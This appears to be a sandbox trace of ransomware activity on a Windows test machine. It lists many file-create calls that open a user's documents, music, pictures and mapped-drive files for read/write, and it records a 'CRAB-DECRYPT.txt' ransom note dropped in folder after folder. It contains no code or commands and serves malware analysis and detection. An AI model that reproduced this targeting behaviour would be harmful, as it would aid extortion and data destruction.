Create C:\Users\Nd9E1FYi\Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\MyVpu.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\8KdP1zVgyza2WB4YuYBy.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\M_CHyV1AF6ug5VOwl.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\n4OwU.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\Ndo7yk7mA1 4f9Z.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\OQgO-r48LdFGEy63aCY.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\Outlook Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\Outlook Files\ldkhh@oedd.de.pst desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\9HqwEbX7Ln7H.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\P9fCWBOY-l.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\pOCdHdUN5EEiedm5Ct.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\pUsocY.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\q8mF0_KHya0K9utMH0cG.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\qNm_xzCD.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\9ZTbafp.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\QO EUigo4EXK9olc0XpX.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\r1sp-wV96nAjkRK.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\r6PXFHzw-.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\REkt.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\RHbIT0mnhhyB.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\EdkUgdunNhUsDwiV5VL.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\RlQf78f7r3L7_m.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\Rr9y.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\S9-7VoNLm5We-.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\SFJfWe_xbxjr_0QHJ7.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\sYdi1iD2SlroiBmUO1.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\s_wtt21h2.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\RxFoEpC5uC.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\T6SK.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\T87fWEkNQqVgt.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\u5yfJ5Dj8.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\uok42anf6rkWD5o.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\uXwt eePK.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\sifLLk9MkzE.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\UZGaw3RhFkNhQARy6.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\w7n_pc.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\WAsSzGR_aBTObV.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\wbxbaYD9AL.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\6dWSrqDXT.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\wRaq.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\qfhJe21I1iEPfDSocb1f.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\qmtME3h8QVa74sICzw.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\wVGypC6c_8.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\x-tAr U1thhtmy24.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\X92otNpR-x5Zma_ Dmt_.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\xHjYo.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\xmFZUHlNX2960gz.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\YafdM6xMz.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\YUFw65UL.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\yVJ4yghUyczj_wPOEFm.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\RaZrRuMAHW1D9.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Documents\Z0wcTdfJmjLHe2Dd.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\_3noyG57lzSpeak.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Documents\_wnatvZlC6XqeL.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Downloads\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\360 Safeguard.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\Avito.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\Bing.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\ZWHKH4ncD.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\Daily Mail.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\eBay UK.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\Google Egypt.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\Google file storage.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\Google France.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\Google Japan.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\0in5AWEIxKMUstDhHc.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\Google Russia.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\Google Taiwan.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\Google Turkey.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\Hao123.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\Links\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\MSN.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\Nicovideo.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\LRgNGE3acWIgEa.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\Sohu.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\Twitch.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\Yahoo News Japan.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\Yandex.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Favorites\Zhihu.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Links\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create Z:\1ngG8KQUVLO.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\Music\4HyC47VsRdMug7Gc\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Music\aqUncS51gyQ66kdm0p.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\EYd9uzm2uBvXNM.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\IGFj0BTIDDvf5Dt3A.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\P_Px\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Music\P_Px\29sQJgTJn6vfV.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\P_Px\h6GPodAi0hSbAnF_r.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\P_Px\hwDUcpa1JBujJ.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\P_Px\tets6 HWEXzv8Da26Fcf.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\vhzlvnYmCpbfD.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Music\P_Px\wgRWvQJa8iJ_hMepL6.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\P_Px\yMjOMRUyemD4dlr0n.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\qIcNo.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\QM80RPucM\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Music\QM80RPucM\4Z-EgFIopteJ7\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Music\QM80RPucM\4Z-EgFIopteJ7\6dmfdQmH3.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\QM80RPucM\4Z-EgFIopteJ7\dTH__zhIamvc98.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\QM80RPucM\4Z-EgFIopteJ7\up YA1Y8oxDA.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\QM80RPucM\4Z-EgFIopteJ7\Y9fRCStGrxko.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\TWOSOYcL.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Music\QM80RPucM\o-VexDI.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\QM80RPucM\vyyOJqo UsqlQbEZP9f.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\8cYqNm-.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\b8AGJwR.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\K6jyK5\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\K6jyK5\6tl6Y7XkOe6_wGtiQB.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\K6jyK5\CrvQe_4CUjzS\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\K6jyK5\nTbDCTW818Aix\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\K6jyK5\nTbDCTW818Aix\9JYy0zhGPBA.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\vJvHFLFe.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\K6jyK5\nTbDCTW818Aix\OCc9jwfTXSSXCwIQ3FwT.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\K6jyK5\nTbDCTW818Aix\w13AP63T9TkT.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\K6jyK5\nTbDCTW818Aix\xT6biou.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\pMUVN.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\vEyv.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\wDDlTMUtzuPRjXldKW.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Music\_SkRz7uqznuwQ.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\My Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\NetHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create Z:\9Mb9yKA.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\ntuser.dat.LOG1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\ntuser.dat.LOG2 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\ntuser.ini desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\OneDrive\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\-suVf3QALoxUB6G.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\7luG_S6_dk4.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
